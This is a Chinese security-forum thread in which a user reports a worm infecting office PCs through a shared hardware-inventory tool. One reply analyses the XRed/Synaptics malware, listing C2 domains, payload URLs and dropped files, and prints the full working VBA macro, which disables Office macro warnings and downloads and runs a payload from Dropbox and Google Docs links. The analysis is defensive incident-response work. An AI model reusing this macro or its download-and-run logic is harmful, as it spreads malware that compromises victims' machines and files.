吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 399|回复: 10
上一主题 下一主题
收起左侧

电脑的xlsx文档变成xlsm格式了

  [复制链接]
跳转到指定楼层
楼主
苏幕遮lx 发表于 2026-9-14 10:38 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 苏幕遮lx 于 2026-9-14 11:25 编辑

似乎感染蠕虫病毒了,我用火绒查了下,似乎是下面这个软件导致的。


是出自论坛里发布的软件:https://www.52pojie.cn/forum.php?mod=viewthread&tid=2015522&extra=page%3D1&page=1

因为只查出了这个软件存在问题,且软件也分享给了其他同事进行电脑信息盘点,今天同事说他的电脑也出现了xlsx文档改变格式的问题,而且是所有xlsx文档都被修改了

能麻烦各位大佬帮忙看一下吗?我用论坛里的SynapticsKiller工具检测了一下,说是未感染的。

病毒软件下载地址:https://pan.baidu.com/s/1fJ5cirjtWj5E8EkPM3ejSg 提取码: f8d9

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
AI-Compare 发表于 2026-9-14 12:30
本帖最后由 AI-Compare 于 2026-9-14 15:06 编辑

已下载,下方同步样本的进度,建议对U盘等资产进行全盘扫描
目前快速/初步结果为软件被蠕虫感染,而非病毒由此软件产生

目前火绒能对该蠕虫病毒,进行
清除恶意代码,将文件还原正常


病毒通讯

域 名 mooo[.]com
注册商 Porkbun LLC
注册人 Socketfire, Inc
邮 箱
省/州 加利福尼亚州(California)
地 区 美国(US)
注册日 2000-03-24 14:27:37 UTC+8
过期日 2028-03-24 13:27:37 UTC+8
更新日 2025-01-15 03:25:14 UTC+8
IANA_ID 1861
状 态 客户端禁止删除
    客户端禁止转移
    禁止删除
    禁止转移
DNS  ns1[.]afraid[.]org
    ns2[.]afraid[.]org
    ns3[.]afraid[.]org
    ns4[.]afraid[.]org
DNSSEC 未配置
域 名 site50[.]net
注册商 GoDaddy.com, LLC
注册日 2008-08-08 10:41:16 UTC+8
过期日 2028-08-08 10:41:16 UTC+8
更新日 2026-08-08 19:57:58 UTC+8
IANA_ID 146
状 态 客户端禁止删除
    客户端禁止续费
    客户端禁止转移
    客户端禁止更新
DNS  dns1[.]000webhost[.]com
    dns2[.]000webhost[.]com
DNSSEC 未配置

文件指纹(被感染)

HW-info-svr.exe
大小: 859136 字节 : 839 KiB
CRC32: BDB94301
CRC64: 99E6E213C8000942
XXH64: B01BA4FD85C25F5E
SHA256: 89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
SHA3-256: 1815f1ddf78479b5f124f00fb6cb23efc1894e3f3a4b330077f762c747ca82a0

HW-info-167775531-app.exe
大小: 859136 字节 : 839 KiB
CRC32: BDB94301
XXH64: B01BA4FD85C25F5E
SHA256: 89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
SHA3-256: 1815f1ddf78479b5f124f00fb6cb23efc1894e3f3a4b330077f762c747ca82a0

文件指纹(清除后)

HW-info-svr.exe
大小: 87568 字节 : 85 KiB
CRC32: B370766E
CRC64: D34F773A7B5B8E3B
XXH64: BEB22B7FA610E892
SHA256: 93c817b142164632e97c5f13893cf298ae28a3da49fcbc4285776be2b13d7284
SHA3-256: 9b4e4baf774328e401729b893e27da25b18dd7141f4c392702935b2569a32621

HW-info-167775531-app.exe
大小: 87568 字节 : 85 KiB
CRC32: B370766E
CRC64: D34F773A7B5B8E3B
XXH64: BEB22B7FA610E892
SHA256: 93c817b142164632e97c5f13893cf298ae28a3da49fcbc4285776be2b13d7284
SHA3-256: 9b4e4baf774328e401729b893e27da25b18dd7141f4c392702935b2569a32621

火绒扫描(我自己的本地扫描结果)
6.0.11.3 版本
09-13 18:49 病毒库

2026/09/14 12:10:18
病毒防护
病毒查杀
自定义扫描(手动执行),发现2个风险项目

病毒库时间:2026-09-13 18:49
开始时间:2026-09-14 12:10
执行类型:手动执行
扫描类型:自定义扫描
总计用时:00:00:01
扫描对象:2
扫描文件:2
发现风险:2
已处理风险:2
病毒详情:

风险路径:HW-info-svr.exe
风险路径:HW-info-167775531-app.exe
病毒名:Virus/Synares.a$SA
病毒ID:D2FA1336675E0954
处理结果:已处理,清除恶意代码

卡巴病历

Trojan.XRed.UDP.C&C
Trojan.Win32.XRed.*t
Trojan.Win32.XRed.*b
Trojan.Win32.XRed.ox
Trojan.Win32.XRed.op
Trojan.Win32.XRed.nd
Trojan.Win32.XRed.mq
Trojan.Win32.XRed.mg
Trojan.Win32.Agent.*b
Backdoor.Agent.HTTP.C&C
Trojan.Win32.Agentb.jrhy
BSS:Exploit.Win32.Generic
Trojan.MSOffice.SAgent.*b
HEUR:Trojan.Script.Generic
Backdoor.Win32.DarkKomet.hqxy
VHO:Trojan.MSOffice.SAgent.gen
Trojan-Dropper.Win32.Dorifel.sbd
HEUR:Trojan-Ransom.Win32.Gen.gen
HEUR:Trojan-Downloader.Script.Generic
HEUR:Trojan-Downloader.MSOffice.Agent.gen

恶意载荷

http://xred[.]site50[.]net/syn/SUpdate.ini
http://xred[.]site50[.]net/syn/Synaptics.rar
http://xred[.]site50[.]net/syn/SSLLibrary.dll

https://www[.]dropbox[.]com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
https://www[.]dropbox[.]com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
https://www[.]dropbox[.]com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

https://docs[.]google[.]com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://docs[.]google[.]com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://docs[.]google[.]com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://freedns[.]afraid[.]org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

释放文件

%LocalAppData%\Temp\86210000
%USERPROFILE%\Desktop\~$cache1
%USERPROFILE%\AppData\Roaming\WinSl
%LocalAppData%\Temp\~$2tjYID4v.xlsm
C:\ProgramData\Synaptics\RCXDD6F.tmp
C:\ProgramData\Synaptics\Synaptics.exe
%USERPROFILE%\Desktop\~$My Document.xlsx
%LocalAppData%\Temp\~DFFDCC06994B44E096.TMP
%LocalAppData%\Temp\rRkw\._cache_8frufytb_7b4fa047e.exe <<<B370766E,蠕虫释放未感染的正常文件
%LocalAppData%\Temp\{1EEB5481-619C-4EF1-9918-C71451630E63} - OProcSessId.dat

感染文件

%USERPROFILE%\Desktop\My Document.xlsm
%USERPROFILE%\Desktop\~$My Document.xlsx

修改覆盖

%LocalAppData%\Microsoft\Office\OTele\excel.exe.db-wal
%LocalAppData%\Microsoft\Office\OTele\excel.exe.db-shm
%LocalAppData%\Microsoft\Office\16.0\excel.exe_Rules.xml
%LocalAppData%\Microsoft\Office\OTele\excel.exe.db.session-journal
%LocalAppData%\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
%LocalAppData%\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres
%LocalAppData%\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8C98ABC0-1C19-4D21-BEC8-EB990BDFB937

执行命令

C:\ProgramData\Synaptics\Synaptics.exe InjUpdate
"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

设置键值

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

Synaptics Pointing Device Driver
REG_SZ
C:\ProgramData\Synaptics\Synaptics.exe

恶意宏码

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim SheetsChanged As Boolean
Dim SheetCount As Integer

Private Sub Workbook_Open()
  Dim i As Integer
  For i = 1 To ActiveWorkbook.Sheets.Count
    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
  Next i

  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"

  Application.DisplayAlerts = False
  SheetCount = Worksheets.Count

  Call MPS

  ActiveWorkbook.Sheets(1).Select
  SheetsChanged = False
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)
  If Not SheetsChanged Then
    ActiveWorkbook.Saved = True
  End If
End Sub

Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
  SheetsChanged = True
End Sub

Private Sub Workbook_NewSheet(ByVal Sh As Object)
  SheetsChanged = True
End Sub

Private Sub Workbook_SheetActivate(ByVal Sh As Object)
  If ActiveWorkbook.Sheets.Count <> SheetCount Then
    SheetsChanged = True
    SheetCount = ActiveWorkbook.Sheets.Count
  End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
  Dim i As Integer
  Dim AIndex As Integer
  Dim FName

  AIndex = ActiveWorkbook.ActiveSheet.Index

  If SaveAsUI = False Then
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False

    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    ActiveWorkbook.Save

    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False

    Application.ScreenUpdating = True
    Application.EnableEvents = True
  Else
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False

    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i

    FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalışma Kitabı (*.xlsm), *.xlsm")
    If FName <> False Then
      ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
      SaveAsInj ActiveWorkbook.Path
    End If

    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False

    Application.ScreenUpdating = True
    Application.EnableEvents = True
  End If
End Sub

Sub SaveAsInj(DIR As String)
  Dim FSO As Object
  Dim FN As String

  Set FSO = CreateObject("scripting.filesystemobject")
  FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"

  If FSO.FileExists(FN) Then
    If Not FSO.FileExists(DIR & "\~$cache1") Then
      FileCopy FN, DIR & "\~$cache1"
    End If
    SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
  End If
End Sub

Function RegKeyRead(i_RegKey As String) As String
  Dim myWS As Object

  On Error Resume Next
  Set myWS = CreateObject("WScript.Shell")
  RegKeyRead = myWS.RegRead(i_RegKey)
End Function

Function RegKeyExists(i_RegKey As String) As Boolean
Dim myWS As Object

  On Error GoTo ErrorHandler
  Set myWS = CreateObject("WScript.Shell")
  myWS.RegRead i_RegKey
  RegKeyExists = True
  Exit Function

ErrorHandler:
  RegKeyExists = False
End Function

Sub RegKeySave(i_RegKey As String, _
               i_Value As String, _
      Optional i_Type As String = "REG_SZ")
Dim myWS As Object

  Set myWS = CreateObject("WScript.Shell")
  myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub

Sub MPS()
  Dim FSO As Object
  Dim FP(1 To 3), TMP, URL(1 To 3) As String

  Set FSO = CreateObject("scripting.filesystemobject")
  FP(1) = ActiveWorkbook.Path & "\~$cache1"
  FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

  URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
  URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  TMP = Environ("Temp") & "\~$cache1.exe"

  If FSO.FileExists(FP(1)) Then
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(1), TMP
    End If
    Shell TMP, vbHide
  ElseIf FSO.FileExists(FP(2)) Then
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(2), TMP
    End If
    Shell TMP, vbHide
  Else
    If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
      Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
    ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
      Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
    ElseIf Not FSO.FileExists(TMP) Then
      If FDW((URL(1)), (TMP)) Then
      ElseIf FDW((URL(2)), (TMP)) Then
      ElseIf FDW((URL(3)), (TMP)) Then
      End If
      If FSO.FileExists(TMP) Then
        Shell TMP, vbHide
      End If
    Else
      Shell TMP, vbHide
    End If

  End If

End Sub

Function FDW(MYU, NMA As String) As Boolean
  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
  If WinHttpReq Is Nothing Then
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
  End If

  WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
  WinHttpReq.Option(6) = AllowRedirects
  WinHttpReq.Open "GET", MYU, False
  WinHttpReq.Send

  If (WinHttpReq.Status = 200) Then
    If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
      FDW = True
      Set oStream = CreateObject("ADODB.Stream")
      oStream.Open
      oStream.Type = 1
      oStream.Write WinHttpReq.ResponseBody
      oStream.SaveToFile (NMA)
      oStream.Close
    Else
       FDW = False
    End If
  Else
    FDW = False
  End If
End Function

文件属性(被感染)

[ Malware installer - set Autorun->SynaptiCS.exe ] - not a real Synaptics installer - stub : Borland Delphi ( 2.0 - 7.0 ) 1992 - borland.com
Ripp for orginal exe file , infect all exe files ! , exe or archives inside RES

调试符号
无

编译时间
1992-06-20 06:22:17

类型
应用程序

文件版本
1.0.0.4

产品版本
1.0.0.0

公司名称
Synaptics

产品名称
Synaptics Pointing Device Driver

语言
土耳其语(土耳其)

原始文件名
空

文件属性(清除后)

MS Visual C# / Basic.NET  [ Link 48 ]  [Deb. 02]  - EP Token : 060000C5 - [ WARNING : Debug x 7 ]  , 
Overlay :  Signed

调试符号
C:\1、软件工具\电脑信息收集软件HW-info_v2.0\hw-info-master\HW_info\obj\Debug\HW-info-svr.pdb

编译时间
2026-02-02 09:11:35

类型
应用程序

文件说明
产品名称
HW_info

文件版本
产品版本
2.0.9529.16547

版权
Copyright © 2024

语言
语言中性

原始文件名
HW-info-svr.exe

异常数签(清除后)

已处理证书链,但是在不受信任提供程序信任的根证书中终止。
由于 CA 根证书不在 “ 受信任的根证书颁发机构 ” 存储区中,所以它不受信任。
此 CA 根目录证书不受信任。要启用信任,请将该证书安装到 “ 受信任的根证书颁发机构 ” 存储区。

DESKTOP-PK8BO1P\Administrator
签名时间不可用
SHA256 摘要算法,RSA 摘要加密算法
DESKTOP-PK8BO1P\Administrator 签发
证书序列号:27 23 68 41 9d 25 d6 ba 4e 46 0b c4 72 2e 1c e9

样本情况(被感染)
https://ata.360.net/report/866515348895744
https://virusscan.jotti.org/zh-CN/filescanjob/midv6gve9b
https://tix.qq.com/search/single?keyword=57b4fa047e15b9635e58935eec1bfae2
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaCeJztymTITNisARHhG
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMzUzMzc2ZHNmYXNkZmFzZGY=/
https://sandbox.dbappsecurity.com.cn/analysis/cb11c361-b4d7-4778-b331-89e47b5552ec/flat
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=57b4fa047e15b9635e58935eec1bfae2
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=57b4fa047e15b9635e58935eec1bfae2
https://metadefender.com/results/file/bzI2MDkxNFFkU3ZSOTY1N0drMjFxNXdCU2Mz_mdaas/overview
https://www.virscan.org/report/89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
https://www.virustotal.com/gui/file/89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
https://s.threatbook.com/report/file/89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=fa1cbedcc94b47d9507e8c33591dd077&sk=43004838
https://opentip.kaspersky.com/89416D130C4CAC636A651145A4907779BE005648134C7EB3795F6D889AB6C245/results?tab=upload

沙发
PythonPan 发表于 2026-9-14 11:16
建议你看看U盘插过的电脑,这种看上去很像通过U盘传播的蠕虫
3#
风动 发表于 2026-9-14 11:18
有可能是复制外部数据,代入了宏,Excel会强制要求保存为启用宏的格式,也就是XLSM。小概率是中了宏病毒,你先自查下吧。
4#
laicaiq 发表于 2026-9-14 11:22
应该是被一些小恶意程序修改了
5#
kulouxiaohai 发表于 2026-9-14 11:24
可能是宏引起的。换个杀软再看看。
6#
 楼主| 苏幕遮lx 发表于 2026-9-14 11:26 |楼主
kulouxiaohai 发表于 2026-9-14 11:24
可能是宏引起的。换个杀软再看看。

因为我同事并不是个别文档格式改变了,而是所有,所以我才怀疑是不是病毒的问题
8#
devSteven 发表于 2026-9-14 13:42
这是宏病毒病吧 xlsm是启用宏的excel文件,一般很少用,除非你自己写了宏。
9#
shaokui123 发表于 2026-9-14 13:55
楼主说的那个软件不是开源的吗
10#
lishengde322 发表于 2026-9-14 14:11
我是用的火绒清理掉的  之前我得这个病毒的时候,xlsm的表格的作者都是RP1,这种就是百分百的病毒,把我数据都搞丢了。我用的火绒,火绒专杀,还有我们吾爱论坛里的有一个专杀工具,一起杀的,把我NAS的文件夹也全部带着杀了一遍,现在整个公司电脑里都没在出现过,已经3个月了一切正常
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-9-15 14:10

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表